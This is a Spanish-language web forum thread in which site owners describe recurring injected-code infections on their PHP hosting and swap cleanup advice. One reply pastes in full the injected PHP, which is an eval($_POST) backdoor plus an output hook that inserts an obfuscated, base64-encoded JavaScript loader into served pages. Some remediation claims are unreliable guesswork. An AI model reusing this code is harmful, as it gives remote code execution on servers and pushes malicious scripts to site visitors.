Codigo malicioso dentro de pagina web con codificacion unescape javascript inyeccion

Hola a todos,

Tengo un gran problema con mis paginas webs, ya que al parecer estas infectadas por un troyano o algun virus y no se que hacer por que las limpio del codigo malicioso, cambie los accesos mas de una vez y igual sigo con el mismo problema una y otra vez, dejo limpio el servidor y me voy a dormir y cuando vuelvo al dia siguiente se ha vuelto a infectar de nuevo todo el servidor que consta de 15 paginas webs con sistemas en php y este problema me va volver loco.

Bueno ahora si pasare a explicar rapidamente el problema que tengo con mis webs.

¿Como detecte que estaba siendo infectado??

Bueno las paginas repentinamente comenzaron a cargarse lentamente ( se demoraban mas de lo comun en cargar y se hacia extraño )
Hasta que un cliente nos envio una captura de pantalla con el mensaje que le habia dado el Antivirus kapersky en el cual le advertia sobre un troyano.
Navegando sobre internet explorer.

entonces procedimos a entrar al servidor mediante el acceso ftp

y nos dimos con la sorpresa de que
en la mayoria de las paginas .php , .html y .js
se encontraba un codigo como el que puse aqui abajo ( que no se si sea bueno que lo pegue aqui por eso corte el codigo malicioso y solo pegue un poco para que no haga daño ni nada )

Otra cosa que pasa es que ese codigo varia osea en algunos archivos se edita y se graba como el codigo de abajo
y tiene como 5 variaciones o algo asi.
y en ocaciones tiene delante de este codigo etiqueta de javascript

la imagen del codigo esta en un servidor que no esta infectado
al parecer no puedo poner links por que soy nuevo
jansanchez.com/infeccion_en_js.jpg
por eso pongo la direccion asi

otro codigo que tambien encontramos en el servidor y en especial en algunos archivos php.

es este..

jansanchez.com/infeccion_en_php.jpg


Luego tambien observamos que en la mayoria de las carpetas que se llaman images si importar el nivel de profundidad en que se encuentre la ruta de la carpeta se graba un archivo .php que mayormente tiene el nombre de image.php o tambien se graba con un numero aleatorio de 5 o 6 digitos por ejempo podria llamarse 147689.php


en el cual se aprecia masomenos este codigo...

jansanchez.com/image.php.jpg

La verdad es la primera vez que posteo algo y la verdad estoy muy preocupado por que los clientes siempre me llaman y ya no se que hacer.

Gracias de antemano

Y disculpas si es que no se pueden enviar estos codigos por un foro

Eso aparentemente es un exploit que esta haciendo desastres.

A mi me sucedio algo parecido, pero yo no administro el hosting asi que no se como hicieron para solucionarlo.

Lo unico que se, es que les tomo como una semana de trabajo a full para solucionarlo.

Tal vez en algun foro de spyware o de hosting te puedan ayudar.

Saludos..

Saludos, por lo que veo el virus está muy currado, con parte del código encriptado en base64. Quizás tu pc este infectado y el virus se dedique a poner eso en todos los html o php´s de tu pc. Revisa archivos html de otras carpetas de tu pc para ver si es ese el problema, y si solo afecta a los archivos web que tienes en tu hosting será problema de seguridad externo.

Muchas gracias la verdad que aun no encuentro la solucion pero hemos bajamos una web entera y la escaneamos con varios antivirus y el antivirus que encontro codigo malicioso en casi todos los casos fue el Avast y el kapersky Tambien detecta pero el que detecta el codigo es el Avast antivirus pero el codigo de el archivo image.php no lo detecta..

este codigo comienza con este codigo...

<?php eval(base64_decode('

Bueno espero que a los que les este pasando este problema podamos ayudarnos entre nosotros!

Tambien estaba pensando que podiamos evitar eso modificando en el cpanel
los permisos de escritura de las capetas.

por que es evidente que hay scripts que estan siendo inyectados en nuestros archivos php, html y js

Bueno si alguien nos puede ayudar seria muy bueno!

Una Pregunta grangonzo ¿estas seguro de que ya esta solucionado en tu servidor?
osea estas seguro de que la empresa que ve el hosting de tu pagina web ya soluciono el problema?
por que de esa manera sabriamos que debe haber una cura o metodos para llegar a librarnos de ese virus

acabo de encontrar otro archivo que se guarda en las carpetas "images" se llama
164580.php

al parecer este archivo es el que obtiene la informacion de nuestro servidor.

Lo maximo!!! al parecer ya encontre la cura del sida ( es decir ya encontre la solucion! ) con tra este virus; ya llevo 4 dias desde que hice unas modificaciones en mi hosting y ya no estoy infectado!

lo unico que hice fue cambiar mi password del servidor dos veces y en el cpanel
quité permisos de carpetas y quite tambien permisos las carpetas las deje en 555 y los archivos indes.php y los javascripts los deje en 444

ojo: deben modificar desde el cpanel
no desde el ftp ni nada de eso
por que no funciona solo desde el cpanel!

suerte!

yo también ando con problemillas de ese tipo desde hace unos dias, en muchos casos quizas pueda ser la solución el cambiar los permisos en las carpetas y archivos, habra que probar a ver, cogere y sobrescribire los archivos al server para que esten limpios y luego les cambio los permisos a ver...

a mi me pasaba como a ti, especialmente en los index, tanto en php como html, los abria con el editor y veia codigos que se habian insertado, los borraba subia y al poco se volvian a colocar!

asi que probare a ver cambiando los permisos. muchas gracias

no te olvides antes de subir tus archivos en el windows primero selecciona todos tus archivos php js y html y ponles solo lectura luego una vez habiendolos subido metete al cpanel y cambia la contraseña del cpanel ya que el virus la tiene, luego entra a la opcion archivos de tu cpanel ( o alguna opcion de tu cpanel donde puedas cambiar los permisos y asi podras librarte del virus ) enfatiza en los .js el virus ataca siempre a los .js y cuando hayas subido todo correcto y esté con permisos de 555 y 444, cambia la clave del servidor de nuevo!!! suerte!

La contraseña de cpanel te refieres a la contraseña con la que se accede a todo el panel de control del dominio? o es en cambio la contraseña para acceder por ejemplo a lo que seria para subir archivos via FTP.
Mi panel de control del dominio no es cpanel entonces, es plesk

asi es! claro ps cambia la clave de tu panel de control y si la clave de tu ftp es otra diferente a la de tu panel de control entonces cambiala tambien ya que el virus tiene un script que recorrelas claves del servidor q infecto asi que ese virus ya debe tener tu clave ftp y de panel manyas!

suerte!

Hola mira no se mucho de esto pero he pasado por eso antes

No sirve de nada que cambies la clave sin hacer otras cosas porque el estupido que esta monitoreando tu espacio recibe reportes de la actividad.... son mogolicos que no tienen nada que hacer.... ba no me voy a nojar pero veamos :

el codigo que tu dices --> base64. se refiere a que el codigo ha sido encriptado con un script muy conocido llamado CodeLock el mismo sirve para encritptar php html etc etc ....

por otra parte la infeccion por lo que cuentas proviene de tu pc no del hosting, a menos que tengas un hosnting compartido, pero de todos modos para librarte de todo, has una copia de seguridad de tus archivos de tu pc los mas importantes, si no son importanetes dejalos y formatea tu pc a fondo.

te recomiendo que tengas una particion extra en tu pc siempre para almacenar datos de tu web de ese modo no tendras problema a la hora de almacenar o resguardar datos...

volviendo al tema,
1 - Elimina todos los archivos de tu hosnting
2 - solicita a tu servicio de hosnting una nueva contraseña (via telefonica o luego de formatear la pc) de tu panel y ftp en lo posible pideles que no sean las mismas que la del panel sea un y el ftp otra)

3- formatea tu pc a fondo

una vez hecho sube tus nuevos archivos a tu hosting, pero antes NO usues programas ftp descargados de foros con crack o de programas p2p
baja siempre programas ftp de sitios confiables nunca uses descargados de ares o emuele ....etc


tambien seria aconsejable que si tienes algun formulario de contacto o recomendar a un amigo en tu web seria bueno que leas como hacerlos seguros....

Una vez dentro de panel mira el log del servidor ahi encontraras la actividad que tuvo tu espacio y encontraras datos precisos del tio....

saludos!!!

Hola.

Según el proveedor de mi servicio de hosting, se debe a un troyano que es muy dificil de detectar. Este se conecta por FTP y comienza a crear codigo "basura" en la cabecera, cuerpo o pie de pagina. Recomienda utilizar un buen antivirus y original, ademas de un sistema operativo original.

Esto es parte del codigo agregado a los archivos del servidor:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBzT3U9JyUnO3ZhciB sOG49Jz43NmE+NzI+MjBhPjNkPjIyU2M+NzJpPjcwdEU+NmU+N jdpbmU+MjI+MmNiPjNkPjIyVj42NXJzaW9uKD4yOSs+MjI+MmN qPjNkPjIyPjIyPjJjPjc1PjNkbj42MXZpPjY3YT43ND42Zj43M j4yZXU+NzM+NjU+NzI+NDE+NjdlbnQ+M2JpZigoPjc1PjJlPjY 5PjZlZGV4PjRmPjY2KD4yMlc+NjluPjIyKT4zZTApPjI2PjI2P jI4dT4yZWluZGU+NzhPPjY2KD4yMk5UPjIwNj4yMik+M2MwPjI 5PjI2PjI2KGRvPjYzdW0+NjVuPjc0PjJlY28+NmZraWU+MmVpb mRleE9mKD4yMm1pPjY1az4zZD4zMT4yMik+M2M+MzApPjI2PjI 2KHR5cGVvZj4yOHo+NzJ2enRzKT4yMT4zZHR5cGVvZig+MjJBP jIyKSkpPjdiej43MnZ6dHM+M2Q+MjJBPjIyPjNiPjY1dmFsPjI 4PjIyaWYoPjc3aT42ZWRvdz4yZT4yMithKz4yMilqPjNkais+M jIrYSs+MjJNYWpvcj4yMitiKz42MSs+MjJNaW5vcj4yMis+NjI rPjYxKz4yMkJ1aWxkPjIyK2IrPjIyaj4zYj4yMik+M2Jkb2N1P jZkZW50PjJldz43Mml0ZSg+MjI+M2NzY3JpcHQ+MjBzPjcyYz4 zZD4yZj4yZj42N3VtYmw+NjFyPjJlPjYzbj4yZj43MnM+NzM+M mY+M2Y+Njk+NjQ+M2Q+MjI+MmJqKz4yMj4zZT4zYz41Yz4yZj4 3Mz42M3JpcD43ND4zZT4yMik+M2I+N2QnO3ZhciBCdTdyPXVuZ XNjYXBlKGw4bi5yZXBsYWNlKC8+L2csc091KSk7ZXZhbChCdTd yKX0pKCk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

-----------------------------------------------------------------------------------



Lastima que la mayoria de los clientes no utilicen S.O. original y menos antivirus. Si es asi nuestros servidores están expuestos. Me informan que pueden banear las paginas alojadas con estos problemas.

Si cambias la contraseña FTP, al final, siempre tendras que darle los codigos al cliente porque este los necesita.

Si alguien encuentra una "cura" de impedir estos ataques a los pobres archivos del servidor se agradecerá.

Mantengan informados

Hola, hace unos meses tenia el mismo problema.

Un día por casualidad me di cuenta de que algunos de mis archivos tenían un código extraño. Los limpiaba y al siguiente día volvían a aparecer.

Lo que hice fue que descodifique(creo que así se dice) el código que estaba base64 y logre encontrar la raíz del problema, que se encontraba en un archivo vulnerable del editor web TinyMCE (creo que era una versión desactualizada).

Yo no cambie los passwords ni nada, simplemente quite ese programa y limpie nuevamente todos mis archivos infectados y asunto resuelto. De eso hace ya como tres meses y ya no he tenido problemas.


Saludos a todos y espero que mi experiencia les ayude a encontrar la solución a su problema.



Saludos
Bye

Y como se puede hacer eso de descodificar todo ese códido?

Utilice una pagina web que encontré en google. No recuerdo cual fue. Solo busca base64 decoder.

Puedes probar con esta: http://base64-encoder-online.waraxe.us/

Solo copea y pega el código que se encuentra entre las comillas. Por ejemplo:

eval(base64_encode('copea el código que se encuentra aquí'))




Saludos

Bueno a mi ya no me pasa este problema por que ya encontre una solucion y ya tengo casi un mes de estar desinfectado!!!

lo unico que hice fue limpiar de ese codigo "basura" todas mis paginas, busque en las carpetas "images" los archivos php que se graban alli y le pase el Avast antivirus y como paso final y creo que el paso que me resolvio el problema fue entrar a mi Cpanel ( panel de administracion de la web ) es donde creas las bases de datos, creas los emails, etc. y alli hay una opcion que dice "archivos" alli tienes que poner permisos de escritura y es sencillo
a las carpetas les das el permiso 555 y a los archivos php, js, html le das los permisos 444

y Listo!

al menos a mi ya no me molestan los virus!

Saludos!